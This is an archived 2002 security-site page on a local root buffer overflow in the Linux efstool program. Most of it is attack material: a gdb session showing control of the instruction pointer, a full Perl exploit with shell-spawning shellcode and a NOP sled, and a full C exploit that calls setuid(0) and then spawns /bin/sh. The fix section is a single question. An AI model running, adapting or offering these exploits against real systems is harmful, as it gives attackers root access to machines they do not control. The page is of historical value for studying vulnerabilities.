Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: General :: lnx5494.htm

efstool local root exploit (buffer overflow)



1st Jul 2002 [SBWID-5494]
COMMAND

	efstool local root exploit (buffer overflow)

SYSTEMS AFFECTED

	slackware 8, mandrake 8, mandrake 7.1

PROBLEM

	clorox 'max' says :
	

	An error in the efstool program on redhat, mandrake,  and  slackware  is
	able to be successfully exploited through a buffer overflow.
	

	[clorox@ptnw clorox]$ efstool `perl -e 'print "A" x 3000'`

	Segmentation fault

	[clorox@ptnw clorox]$ gdb efstool

	GNU gdb 5.1.1

	Copyright 2002 Free Software Foundation, Inc.

	GDB is free software, covered by the GNU General Public License, and you 

	are

	welcome to change it and/or distribute copies of it under certain 

	conditions.

	Type "show copying" to see the conditions.

	There is absolutely no warranty for GDB.  Type "show warranty" for details.

	This GDB was configured as "i386-mandrake-linux"...(no debugging symbols 

	found)...

	(gdb) r `perl -e 'print "A" x 3000'`

	Starting program: /usr/bin/efstool `perl -e 'print "A" x 3000'`

	(no debugging symbols found)...(no debugging symbols found)...(no 

	debugging symbols found)...

	(no debugging symbols found)...(no debugging symbols found)...

	Program received signal SIGSEGV, Segmentation fault.

	0x41414141 in ?? ()

	(gdb) info reg esp

	esp            0xbfffe890    0xbfffe890

	(gdb)

	

	

	 Example

	 =======

	

	#!/usr/bin/perl

	# efstool root exploit

	# written by clorox of Ptrac Networks for BKACC(Bored Kids At ComputerCamp)

	# give the campers internet grogan!

	#

	# tested to work on slackware 8, mandrake 8, mandrake 7.1

	# tweaks may be needed on the offset

	# method 1 works more often but

	# method 2 is faster but not too good

	#

	#

	# enjoy -clorox

	# perl efs.pl -1000

	

	$shellcode =

	"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".

	"\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".

	"\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".

	"\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".

	"/bin/sh";

	

	$shellcode2 =

	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88".

	"\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3".

	"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31".

	"\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".

	"\xff\xff/bin/sh";

	

	$ret = "0xbfffe890";

	$offset = $ARGV[0];

	$nop = "\x90";

	

	if ($ARGV[1] eq "m1") {

	        $len = 3000;

	        for ($i = 0; $i < ($len - length($shellcode)); $i++) {

	                $buffer .= $nop;

	        }

	        $buffer .= $shellcode;

	} elsif ($ARGV[1] eq "m2") {

	        $len = 10010;

	        for ($i = 0; $i < ($len - length($shellcode)); $i++) {

	                $buffer .= $nop;

	        }

	        $buffer .= $shellcode2;

	} else {

	

	        print "You must specify a method fool!\n";

	        print "perl $0 <offset> m1 or m2\n";

	}

	

	$buffer .= pack('l', ($ret + $offset));

	$buffer .= pack('l', ($ret + $offset));

	exec("efstool $buffer");

	

	

	-Or-
	

	

	/* efstool.c - efstool/bof simple overflow in efstool, 

	 *

	 *

	 * This code is published propterty of CloudAss, you may

	 * duplicate this in any shape or form without prior written

	 * permission from CloudAss.

	 *

	 * Bug discovered by ntfx, just figured I'd code a decent

	 * exploit for it.

	 *

	 *

	 * DISCLAIMER - I am in no way affiliated with ntfx or any members of 

	 * soldierx or legion2002 security.

	 *

	 * Usage: ./efsroot offset - bruteforce if neccesary

	 *

	 * Bug is pretty stupid, and simple, I have yet to see it give root.

	 * efstool is not +s on slackware 8.0 , it should spawn a shell

	 * regardless.

	 * 

	 * (C) COPYRIGHT CloudAss , 2002

	 * all rights reserved

	 ***********************************************************************

	 */

	

	#include <stdio.h>

	#include <string.h>

	#include <stdlib.h>

	

	#define SIZE 3000			

	#define NOP 0x90		

	#define PATH "/opt/gnome/bin/efstool"	

	

	//--------------------------------------------------

	long get_esp(void){ __asm__("movl %esp,%eax\n");}

	//--------------------------------------------------

	

	char shellcode[]=

	   "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" 

	   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

	   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

	   "\x80\xe8\xdc\xff\xff\xff/bin/sh";

	

	int main(int argc, char *argv[]) {

		char buffer[SIZE];

		long retaddr, offset;

		int i;

	

		offset = atoi(argv[1]);

		retaddr = get_esp() + offset;

	

		for(i=0; i < SIZE; i+=4)

		 	*(long *)&buffer[i] = retaddr;

	

		for(i=0; i < strlen(shellcode); i++)

			*(buffer+i) = NOP;

	

		memcpy(buffer+i, shellcode, strlen(shellcode));

		execl(PATH, "efstool", buffer, 0);

		return 0;

	}

	

SOLUTION

	Updated package available ?


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH